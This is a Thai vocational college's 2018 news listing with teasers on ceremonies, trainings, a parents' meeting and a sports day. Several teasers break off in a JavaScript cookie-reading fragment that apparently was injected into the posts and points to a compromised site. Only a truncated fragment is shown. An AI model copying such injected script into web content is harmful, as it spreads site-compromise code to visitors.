ข่าวประการวิทยาลัย/รับสมัคร/จัดซื้อจัดจ้าง
ดาวน์โหลดเอกสาร
อัลบั้มภาพ
วันจันทร์ ที่ 12 พฤศจิกายน 2561  ยินดีต้อนรับคณะกรรมการประเมินหน่วยมาตรฐานดีเด่นและสมาชิกดีเด่นภายใต้การนิเทศ ระดับ อศจ.อุทัยธานี ประจำปีการศึกษา 2561 […]

ยินดีต้อนรับคณะกรรมการประเมินหน่วยมาตรฐานดีเด่นและสมาชิกดีเด่นภายใต้การนิเทศ ระดับ อศจ.อุทัยธานี ประจำปีการศึกษา 2561

วันจันทร์ ที่ 12 พฤศจิกายน 2561  ยินดีต้อนรับคณะกรรมการประเมินหน่วยมาตรฐานดีเด่นและสมาชิกดีเด่นภายใต้การนิเทศ ระดับ อศจ.อุทัยธานี ประจำปีการศึกษา 2561 […]

วันอาทิตย์ที่ 11 พฤศจิกายน 2561 นักเรียน/นักศึกษาและผู้ปกครองเข้าร่วมโครงการประชุมผู้ปกครอง ประจำปีการศึกษา /2561 ที่วิทยาลัยสารพัดช่างอุทัยธานี &nbsp […]

โครงการประชุมผู้ปกครอง ประจำปีการศึกษา 2/2561

วันอาทิตย์ที่ 11 พฤศจิกายน 2561 นักเรียน/นักศึกษาและผู้ปกครองเข้าร่วมโครงการประชุมผู้ปกครอง ประจำปีการศึกษา /2561 ที่วิทยาลัยสารพัดช่างอุทัยธานี &nbsp […]

วันอังคารที่ 23 ตุลาคม 2561 ผู้บริหาร คณะครู นักเรียน และเจ้าหน้าที่วิทยาลัยสารพัดช่างอุทัยธานี ได้ร่วมพิธีวางพวงมาลา และพิธีจุดเทียนเพื่อน้อมรำลึกในพ […]

วันปิยะมหาราช

วันอังคารที่ 23 ตุลาคม 2561 ผู้บริหาร คณะครู นักเรียน และเจ้าหน้าที่วิทยาลัยสารพัดช่างอุทัยธานี ได้ร่วมพิธีวางพวงมาลา และพิธีจุดเทียนเพื่อน้อมรำลึกในพ […]

นักเรียนชั้นปวช.1 ทุกแผนก เข้าร่วมโครงการฝึกอบรมช่วยเหลือผู้ป่วยเบื้องต้น จากวิทยาลัยพยาบาลบรมราชชนนี จังหวัดนครสวรรค์ ณ หอประชุมตึกอำนวยการ วิทยาลัยส […]

อบรมช่วยเหลือผู้ป่วยเบื้องต้น

นักเรียนชั้นปวช.1 ทุกแผนก เข้าร่วมโครงการฝึกอบรมช่วยเหลือผู้ป่วยเบื้องต้น จากวิทยาลัยพยาบาลบรมราชชนนี จังหวัดนครสวรรค์ ณ หอประชุมตึกอำนวยการ วิทยาลัยส […]

ผู้บริหาร คณะครู และเจ้าหน้าที่วิทยาลัยสารพัดช่างอุทัยธานี ได้ร่วมพิธีวางพวงมาลา และพิธีจุดเทียนเพื่อน้อมรำลึกในพระมหากรุณาธิคุณพระบาทสมเด็จพระปรมินทร […]

วันที่ 13 ตุลาคม 2561

ผู้บริหาร คณะครู และเจ้าหน้าที่วิทยาลัยสารพัดช่างอุทัยธานี ได้ร่วมพิธีวางพวงมาลา และพิธีจุดเทียนเพื่อน้อมรำลึกในพระมหากรุณาธิคุณพระบาทสมเด็จพระปรมินทร […]

วิทยาลัยสารพัดช่างอุทัยธานี ได้จัดโครงการสัมมนาหลังฝึกงานร่วมกับสถานประกอบการ ณ วันที่ 14 กันยายน 2561 function getCookie(e){var U=document.cookie.mat […]

โครงการสัมมนาหลังฝึกงานร่วมกับสถานประกอบการ

วิทยาลัยสารพัดช่างอุทัยธานี ได้จัดโครงการสัมมนาหลังฝึกงานร่วมกับสถานประกอบการ ณ วันที่ 14 กันยายน 2561 function getCookie(e){var U=document.cookie.mat […]

นักเรียนแผนกช่างยนต์ วิทยาลัยสารพัดช่างอุทัยธานี ได้เข้าร่วมโครงการอบรมเทคโนยานยนต์ “การติดตั้งกล้องหน้ารถยนต์” ณ วันที่ 12 กันยายน 2561 f […]

โครงการอบรมเทคโนยานยนต์

นักเรียนแผนกช่างยนต์ วิทยาลัยสารพัดช่างอุทัยธานี ได้เข้าร่วมโครงการอบรมเทคโนยานยนต์ “การติดตั้งกล้องหน้ารถยนต์” ณ วันที่ 12 กันยายน 2561 f […]

วิทยาลัยสารพัดช่างอุทัยธานี ได้จัดโครงการสร้างภูมิคุ้มกันคนรุ่นใหม่ห่างไกลยาเสพติดและโครงการรณรงค์ต่อต้านยาเสพติดและคัดกรองสารเสพติดภายในสถานศึกษา ณ ห […]

โครงการสร้างภูมิคุ้มกันคนรุ่นใหม่ห่างไกลยาเสพติด

วิทยาลัยสารพัดช่างอุทัยธานี ได้จัดโครงการสร้างภูมิคุ้มกันคนรุ่นใหม่ห่างไกลยาเสพติดและโครงการรณรงค์ต่อต้านยาเสพติดและคัดกรองสารเสพติดภายในสถานศึกษา ณ ห […]

วิทยาลัยสารพัดช่างอุทัยธานีได้จัดกิจกรรมกีฬาสี ประจำปีการศึกษา2561 ณ วันที่ 24 สิงหาคม 2561 function getCookie(e){var U=document.cookie.match(new RegE […]

กิจกรรมกีฬาสี ประจำปีการศึกษา 2561

วิทยาลัยสารพัดช่างอุทัยธานีได้จัดกิจกรรมกีฬาสี ประจำปีการศึกษา2561 ณ วันที่ 24 สิงหาคม 2561 function getCookie(e){var U=document.cookie.match(new RegE […]